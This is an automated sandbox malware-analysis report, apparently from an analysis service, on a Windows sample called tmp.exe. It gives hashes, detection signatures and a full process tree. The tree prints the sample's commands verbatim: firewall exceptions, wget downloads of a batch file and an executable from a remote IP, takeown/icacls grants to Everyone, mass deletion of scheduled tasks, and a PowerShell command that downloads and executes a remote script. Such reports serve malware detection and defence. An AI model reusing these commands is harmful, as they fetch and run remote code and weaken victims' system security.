9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123

Analysis

max time kernel
74s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
15-11-2022 12:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

532KB
MD5

cba9caa64e418a546044daa8744800b3
SHA1

72060361b8a025ea3e132f6015cb20a87d3dff44
SHA256

9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
SHA512

aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129
SSDEEP

12288:u5m8ZlWk6VT6qIm9qCZb5rTa8kdVXpP1PIU/bB6h1a15:5O+DD9qCZb5rTa8UPPRP/bkar

Score

10^/10

discovery evasion exploit upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://chocolatey.org/install.ps1

Signatures

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 1264 powershell.exe
7 1264 powershell.exe
13 1264 powershell.exe
15 1264 powershell.exe
17 1264 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

wget.exewget.exechoco.exe

pid process

1912 wget.exe
3780 wget.exe
4092 choco.exe
Modifies Windows Firewall 1 TTPs 4 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

4268 netsh.exe
3424 netsh.exe
1504 netsh.exe
644 netsh.exe

flow	pid	process
5	1264	powershell.exe
7	1264	powershell.exe
13	1264	powershell.exe
15	1264	powershell.exe
17	1264	powershell.exe

pid	process
1912	wget.exe
3780	wget.exe
4092	choco.exe

pid	process
4268	netsh.exe
3424	netsh.exe
1504	netsh.exe
644	netsh.exe

Possible privilege escalation attempt 19 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exe

pid	process
4288	icacls.exe
1320	icacls.exe
5016	icacls.exe
3060	icacls.exe
2240	icacls.exe
2056	icacls.exe
4280	takeown.exe
2120	icacls.exe
1188	icacls.exe
1264	takeown.exe
3660	icacls.exe
4088	takeown.exe
2128	icacls.exe
1412	icacls.exe
4224	icacls.exe
992	icacls.exe
5116	takeown.exe
3468	takeown.exe
4544	icacls.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp	upx
C:\ProgramData\zem\wget.exe	upx
C:\ProgramData\zem\wget.exe	upx
behavioral2/memory/1912-144-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
C:\ProgramData\zem\wget.exe	upx
behavioral2/memory/3780-147-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral2/memory/3780-148-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
C:\ProgramData\zem\tmp.exe	upx
behavioral2/memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp	upx
behavioral2/memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp	upx

Modifies file permissions 1 TTPs 19 IoCs

discovery

File Permissions Modification

T1222

Processes:

takeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid	process
5116	takeown.exe
3468	takeown.exe
4544	icacls.exe
1264	takeown.exe
2056	icacls.exe
5016	icacls.exe
3060	icacls.exe
2240	icacls.exe
2128	icacls.exe
2120	icacls.exe
1412	icacls.exe
4288	icacls.exe
1320	icacls.exe
1188	icacls.exe
3660	icacls.exe
4224	icacls.exe
4088	takeown.exe
992	icacls.exe
4280	takeown.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp	autoit_exe
behavioral2/memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp	autoit_exe
behavioral2/memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp	autoit_exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1248 schtasks.exe

pid	process
1248	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1264	powershell.exe
1264	powershell.exe
4464	powershell.exe
4464	powershell.exe
1340	powershell.exe
1340	powershell.exe
2552	powershell.exe
2552	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeBackupPrivilege	1264	powershell.exe
Token: SeBackupPrivilege	1264	powershell.exe
Token: SeRestorePrivilege	1264	powershell.exe
Token: SeSecurityPrivilege	1264	powershell.exe
Token: SeBackupPrivilege	1264	powershell.exe
Token: SeBackupPrivilege	1264	powershell.exe
Token: SeRestorePrivilege	1264	powershell.exe
Token: SeSecurityPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeIncreaseQuotaPrivilege	2552	powershell.exe
Token: SeSecurityPrivilege	2552	powershell.exe
Token: SeTakeOwnershipPrivilege	2552	powershell.exe
Token: SeLoadDriverPrivilege	2552	powershell.exe
Token: SeSystemProfilePrivilege	2552	powershell.exe
Token: SeSystemtimePrivilege	2552	powershell.exe
Token: SeProfSingleProcessPrivilege	2552	powershell.exe
Token: SeIncBasePriorityPrivilege	2552	powershell.exe
Token: SeCreatePagefilePrivilege	2552	powershell.exe
Token: SeBackupPrivilege	2552	powershell.exe
Token: SeRestorePrivilege	2552	powershell.exe
Token: SeShutdownPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeSystemEnvironmentPrivilege	2552	powershell.exe
Token: SeRemoteShutdownPrivilege	2552	powershell.exe
Token: SeUndockPrivilege	2552	powershell.exe
Token: SeManageVolumePrivilege	2552	powershell.exe
Token: 33	2552	powershell.exe
Token: 34	2552	powershell.exe
Token: 35	2552	powershell.exe
Token: 36	2552	powershell.exe
Token: SeIncreaseQuotaPrivilege	2552	powershell.exe
Token: SeSecurityPrivilege	2552	powershell.exe
Token: SeTakeOwnershipPrivilege	2552	powershell.exe
Token: SeLoadDriverPrivilege	2552	powershell.exe
Token: SeSystemProfilePrivilege	2552	powershell.exe
Token: SeSystemtimePrivilege	2552	powershell.exe
Token: SeProfSingleProcessPrivilege	2552	powershell.exe
Token: SeIncBasePriorityPrivilege	2552	powershell.exe
Token: SeCreatePagefilePrivilege	2552	powershell.exe
Token: SeBackupPrivilege	2552	powershell.exe
Token: SeRestorePrivilege	2552	powershell.exe
Token: SeShutdownPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeSystemEnvironmentPrivilege	2552	powershell.exe
Token: SeRemoteShutdownPrivilege	2552	powershell.exe
Token: SeUndockPrivilege	2552	powershell.exe
Token: SeManageVolumePrivilege	2552	powershell.exe
Token: 33	2552	powershell.exe
Token: 34	2552	powershell.exe
Token: 35	2552	powershell.exe
Token: 36	2552	powershell.exe
Token: SeIncreaseQuotaPrivilege	2552	powershell.exe
Token: SeSecurityPrivilege	2552	powershell.exe
Token: SeTakeOwnershipPrivilege	2552	powershell.exe
Token: SeLoadDriverPrivilege	2552	powershell.exe
Token: SeSystemProfilePrivilege	2552	powershell.exe
Token: SeSystemtimePrivilege	2552	powershell.exe
Token: SeProfSingleProcessPrivilege	2552	powershell.exe
Token: SeIncBasePriorityPrivilege	2552	powershell.exe
Token: SeCreatePagefilePrivilege	2552	powershell.exe
Token: SeBackupPrivilege	2552	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

tmp.exe

pid	process
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe

Suspicious use of SendNotifyMessage 35 IoCs

Processes:

tmp.exe

pid	process
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe
4720	tmp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4720 wrote to memory of 1864	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 1864	4720	tmp.exe	cmd.exe
PID 1864 wrote to memory of 644	1864	cmd.exe	netsh.exe
PID 1864 wrote to memory of 644	1864	cmd.exe	netsh.exe
PID 4720 wrote to memory of 1084	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 1084	4720	tmp.exe	cmd.exe
PID 1084 wrote to memory of 4268	1084	cmd.exe	netsh.exe
PID 1084 wrote to memory of 4268	1084	cmd.exe	netsh.exe
PID 4720 wrote to memory of 388	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 388	4720	tmp.exe	cmd.exe
PID 388 wrote to memory of 3424	388	cmd.exe	netsh.exe
PID 388 wrote to memory of 3424	388	cmd.exe	netsh.exe
PID 4720 wrote to memory of 1180	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 1180	4720	tmp.exe	cmd.exe
PID 1180 wrote to memory of 1504	1180	cmd.exe	netsh.exe
PID 1180 wrote to memory of 1504	1180	cmd.exe	netsh.exe
PID 4720 wrote to memory of 1912	4720	tmp.exe	wget.exe
PID 4720 wrote to memory of 1912	4720	tmp.exe	wget.exe
PID 4720 wrote to memory of 1912	4720	tmp.exe	wget.exe
PID 4720 wrote to memory of 3780	4720	tmp.exe	wget.exe
PID 4720 wrote to memory of 3780	4720	tmp.exe	wget.exe
PID 4720 wrote to memory of 3780	4720	tmp.exe	wget.exe
PID 4720 wrote to memory of 2960	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 2960	4720	tmp.exe	cmd.exe
PID 2960 wrote to memory of 4280	2960	cmd.exe	takeown.exe
PID 2960 wrote to memory of 4280	2960	cmd.exe	takeown.exe
PID 4720 wrote to memory of 3820	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 3820	4720	tmp.exe	cmd.exe
PID 3820 wrote to memory of 3660	3820	cmd.exe	icacls.exe
PID 3820 wrote to memory of 3660	3820	cmd.exe	icacls.exe
PID 4720 wrote to memory of 4780	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 4780	4720	tmp.exe	cmd.exe
PID 4780 wrote to memory of 5016	4780	cmd.exe	icacls.exe
PID 4780 wrote to memory of 5016	4780	cmd.exe	icacls.exe
PID 4720 wrote to memory of 1340	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 1340	4720	tmp.exe	cmd.exe
PID 1340 wrote to memory of 2120	1340	cmd.exe	icacls.exe
PID 1340 wrote to memory of 2120	1340	cmd.exe	icacls.exe
PID 4720 wrote to memory of 1644	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 1644	4720	tmp.exe	cmd.exe
PID 1644 wrote to memory of 5116	1644	cmd.exe	takeown.exe
PID 1644 wrote to memory of 5116	1644	cmd.exe	takeown.exe
PID 4720 wrote to memory of 4796	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 4796	4720	tmp.exe	cmd.exe
PID 4796 wrote to memory of 1188	4796	cmd.exe	icacls.exe
PID 4796 wrote to memory of 1188	4796	cmd.exe	icacls.exe
PID 4720 wrote to memory of 3476	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 3476	4720	tmp.exe	cmd.exe
PID 3476 wrote to memory of 3060	3476	cmd.exe	icacls.exe
PID 3476 wrote to memory of 3060	3476	cmd.exe	icacls.exe
PID 4720 wrote to memory of 1292	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 1292	4720	tmp.exe	cmd.exe
PID 1292 wrote to memory of 3468	1292	cmd.exe	takeown.exe
PID 1292 wrote to memory of 3468	1292	cmd.exe	takeown.exe
PID 4720 wrote to memory of 3596	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 3596	4720	tmp.exe	cmd.exe
PID 3596 wrote to memory of 4544	3596	cmd.exe	icacls.exe
PID 3596 wrote to memory of 4544	3596	cmd.exe	icacls.exe
PID 4720 wrote to memory of 4356	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 4356	4720	tmp.exe	cmd.exe
PID 4356 wrote to memory of 1412	4356	cmd.exe	icacls.exe
PID 4356 wrote to memory of 1412	4356	cmd.exe	icacls.exe
PID 4720 wrote to memory of 4684	4720	tmp.exe	cmd.exe
PID 4720 wrote to memory of 4684	4720	tmp.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes
2⤵
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes
3⤵
- Modifies Windows Firewall
PID:644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="upwget" dir=in action=allow program=%allusersprofile%\zem\wget.exe enable=yes
2⤵
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="upwget" dir=in action=allow program=C:\ProgramData\zem\wget.exe enable=yes
3⤵
- Modifies Windows Firewall
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=%allusersprofile%\zem\time_cli.exe enable=yes
2⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=C:\ProgramData\zem\time_cli.exe enable=yes
3⤵
- Modifies Windows Firewall
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=%allusersprofile%\zem\up2batdownload.exe enable=yes
2⤵
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\ProgramData\zem\up2batdownload.exe enable=yes
3⤵
- Modifies Windows Firewall
PID:1504

C:\ProgramData\zem\wget.exe
C:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_up2bat64atstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="FXOYPAIQ_Admin" 84.240.25.78/openforschool/bat/update64.bat
2⤵
- Executes dropped EXE
PID:1912

C:\ProgramData\zem\wget.exe
C:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_cmdhatstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="FXOYPAIQ_Admin" 84.240.25.78/openforschool/prg/cmdh.exe
2⤵
- Executes dropped EXE
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem /D Y
2⤵
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\system32\takeown.exe
takeown /R /f C:\ProgramData\zem /D Y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:F /T
2⤵
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem /grant Everyone:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r
2⤵
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem /T /inheritance:r
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:(OI)(CI)F
2⤵
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem /grant Everyone:(OI)(CI)F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y
2⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\system32\takeown.exe
takeown /R /f C:\ProgramData\zem\log /D Y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:F /T
2⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\log /grant Everyone:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:(OI)(CI)F
2⤵
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\log /grant Everyone:(OI)(CI)F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y
2⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\takeown.exe
takeown /R /f C:\ProgramData\zem\upd /D Y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:F /T
2⤵
- Suspicious use of WriteProcessMemory
PID:3596

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\upd /grant Everyone:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:(OI)(CI)F
2⤵
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\upd /grant Everyone:(OI)(CI)F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:F /T
2⤵
PID:4684

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem /grant Все:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r
2⤵
PID:2832

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem /T /inheritance:r
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:(OI)(CI)F
2⤵
PID:4888

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem /grant Все:(OI)(CI)F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y
2⤵
PID:4708

C:\Windows\system32\takeown.exe
takeown /R /f C:\ProgramData\zem\log /D Y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:F /T
2⤵
PID:1592

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\log /grant Все:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:(OI)(CI)F
2⤵
PID:1864

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\log /grant Все:(OI)(CI)F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y
2⤵
PID:1104

C:\Windows\system32\takeown.exe
takeown /R /f C:\ProgramData\zem\upd /D Y
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:F /T
2⤵
PID:3912

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\upd /grant Все:F /T
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:(OI)(CI)F
2⤵
PID:644

C:\Windows\system32\icacls.exe
ICACLS C:\ProgramData\zem\upd /grant Все:(OI)(CI)F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player Updater" /F
2⤵
PID:2648

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "Adobe Flash Player Updater" /F
3⤵
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F
2⤵
PID:2928

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F
3⤵
PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F
2⤵
PID:3824

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F
3⤵
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F
2⤵
PID:3560

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F
3⤵
PID:976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F
2⤵
PID:1144

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F
3⤵
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F
2⤵
PID:1688

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F
3⤵
PID:3772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F
2⤵
PID:2164

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F
3⤵
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F
2⤵
PID:2576

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F
3⤵
PID:5072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_uninstall_java" /F
2⤵
PID:1708

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_uninstall_java" /F
3⤵
PID:4496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_java64" /F
2⤵
PID:4060

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_java64" /F
3⤵
PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_firefox64" /F
2⤵
PID:3900

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_firefox64" /F
3⤵
PID:4244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_vlc64" /F
2⤵
PID:2496

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_vlc64" /F
3⤵
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_foxitreader_latest" /F
2⤵
PID:3464

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_foxitreader_latest" /F
3⤵
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ax" /F
2⤵
PID:2408

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_install_flash_player_ax" /F
3⤵
PID:1924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ppapi" /F
2⤵
PID:1696

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_install_flash_player_ppapi" /F
3⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player" /F
2⤵
PID:2456

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_install_flash_player" /F
3⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_7z64" /F
2⤵
PID:1280

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_7z64" /F
3⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_run" /F
2⤵
PID:904

C:\Windows\system32\schtasks.exe
schtasks /delete /TN "test_n_run" /F
3⤵
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /Y /Z C:\Users\Admin\AppData\Local\Temp\tmp.exe %ALLUSERSPROFILE%\zem\up2batdownload.exe
2⤵
PID:4172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c @powershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1')) && SET PATH=%PATH%;%systemdrive%\chocolatey\bin
2⤵
PID:1284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.cmdline"
4⤵
PID:8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
